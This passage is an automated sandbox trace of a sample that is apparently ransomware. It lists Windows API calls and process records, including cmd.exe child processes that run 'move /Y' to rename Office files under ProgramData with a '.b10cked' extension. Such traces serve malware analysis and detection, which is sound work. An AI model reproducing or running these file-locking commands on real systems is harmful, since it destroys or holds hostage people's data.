lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fae8, cchData=128 | out: lpLCData="0") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fae8, cchData=128 | out: lpLCData="0") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fae8, cchData=128 | out: lpLCData="1") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.721] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.722] GetConsoleTitleW (in: lpConsoleTitle=0x390930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.722] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.723] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.723] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.723] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.723] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.723] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.723] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.723] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.723] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.723] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.723] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.727] GetConsoleTitleW (in: lpConsoleTitle=0x26f7e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.727] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.727] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.727] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.727] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.727] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.727] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.728] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.728] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.728] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.728] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.728] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.728] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.728] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.728] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.728] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.728] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.728] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.728] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.728] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.728] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.728] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.728] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.728] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.728] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.728] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.728] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.729] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.729] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.730] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f59c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f594, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f594*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.730] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.731] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.731] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.899] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.899] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.899] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0173.899] _wcsicmp (_String1="VISBRR~1.TRX", _String2="..") returned 72 [0173.899] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrr~1.trx")) returned 0x2020 [0173.900] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.900] SetErrorMode (uMode=0x0) returned 0x0 [0173.900] SetErrorMode (uMode=0x1) returned 0x0 [0173.900] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x26ef24, lpFilePart=0x26ef0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", lpFilePart=0x26ef0c*="VISBRR~1.TRX") returned 0x3c [0173.900] SetErrorMode (uMode=0x0) returned 0x1 [0173.900] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.900] _wcsicmp (_String1="VISBRR~1.TRX", _String2=".") returned 72 [0173.900] _wcsicmp (_String1="VISBRR~1.TRX", _String2="..") returned 72 [0173.900] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrr~1.trx")) returned 0x2020 [0173.900] SetErrorMode (uMode=0x0) returned 0x0 [0173.900] SetErrorMode (uMode=0x1) returned 0x0 [0173.900] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", nBufferLength=0x104, lpBuffer=0x26f3a0, lpFilePart=0x26f138 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", lpFilePart=0x26f138*="VISBRR~1.TRX") returned 0x3c [0173.900] SetErrorMode (uMode=0x0) returned 0x1 [0173.900] SetErrorMode (uMode=0x0) returned 0x0 [0173.900] SetErrorMode (uMode=0x1) returned 0x0 [0173.900] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f5a8, lpFilePart=0x26f138 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x26f138*="VISBRRES.DLL.trx_dll.b10cked") returned 0x4c [0173.900] SetErrorMode (uMode=0x0) returned 0x1 [0173.900] SetLastError (dwErrCode=0x0) [0173.900] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll.b10cked")) returned 0xffffffff [0173.900] GetLastError () returned 0x2 [0173.901] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x26eab4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eab4) returned 0x3a2130 [0173.901] FindNextFileW (in: hFindFile=0x3a2130, lpFindFileData=0x26eab4 | out: lpFindFileData=0x26eab4) returned 0 [0173.901] GetLastError () returned 0x12 [0173.901] FindClose (in: hFindFile=0x3a2130 | out: hFindFile=0x3a2130) returned 1 [0173.902] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3a1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1cc0) returned 0x3a2130 [0173.903] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0173.903] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x26ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0173.903] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll")) returned 0x2020 [0173.903] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\visbrres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.903] FindClose (in: hFindFile=0x3a2130 | out: hFindFile=0x3a2130) returned 1 [0173.903] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ed00 | out: _Buffer=" 1") returned 9 [0173.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.903] GetFileType (hFile=0x7) returned 0x2 [0173.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.904] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ec8c | out: lpMode=0x26ec8c) returned 1 [0173.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.904] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ecc0 | out: lpConsoleScreenBufferInfo=0x26ecc0) returned 1 [0173.904] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.904] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ed00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.904] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ece4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ece4*=0x1a) returned 1 [0173.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.904] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.905] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.905] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.905] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.905] SetConsoleInputExeNameW () returned 0x1 [0173.905] GetConsoleOutputCP () returned 0x1b5 [0173.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.905] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.905] exit (_Code=0) Process: id = "305" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23688 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23689 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23690 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23691 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23692 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23693 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23694 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23696 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23697 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23814 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23815 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23816 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23817 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 23818 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 23819 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23820 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23821 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23822 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23823 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23824 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23825 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23826 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23827 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23828 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 23829 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23830 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23831 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23832 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23833 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 23834 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23835 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 23836 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23837 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 406 os_tid = 0xb18 [0173.752] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f94c | out: lpSystemTimeAsFileTime=0x16f94c*(dwLowDateTime=0x9d76b440, dwHighDateTime=0x1d440a9)) [0173.752] GetCurrentProcessId () returned 0xa68 [0173.752] GetCurrentThreadId () returned 0xb18 [0173.752] GetTickCount () returned 0x32931 [0173.752] QueryPerformanceCounter (in: lpPerformanceCount=0x16f944 | out: lpPerformanceCount=0x16f944*=23054135803) returned 1 [0173.753] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.753] __set_app_type (_Type=0x1) [0173.753] __p__fmode () returned 0x76b331f4 [0173.753] __p__commode () returned 0x76b331fc [0173.753] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.753] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.753] GetCurrentThreadId () returned 0xb18 [0173.753] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb18) returned 0x38 [0173.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.753] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.753] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.753] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8dc | out: phkResult=0x16f8dc*=0x0) returned 0x2 [0173.754] VirtualQuery (in: lpAddress=0x16f913, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.754] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f8ac, dwLength=0x1c | out: lpBuffer=0x16f8ac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.754] GetConsoleOutputCP () returned 0x1b5 [0173.754] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.754] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.754] 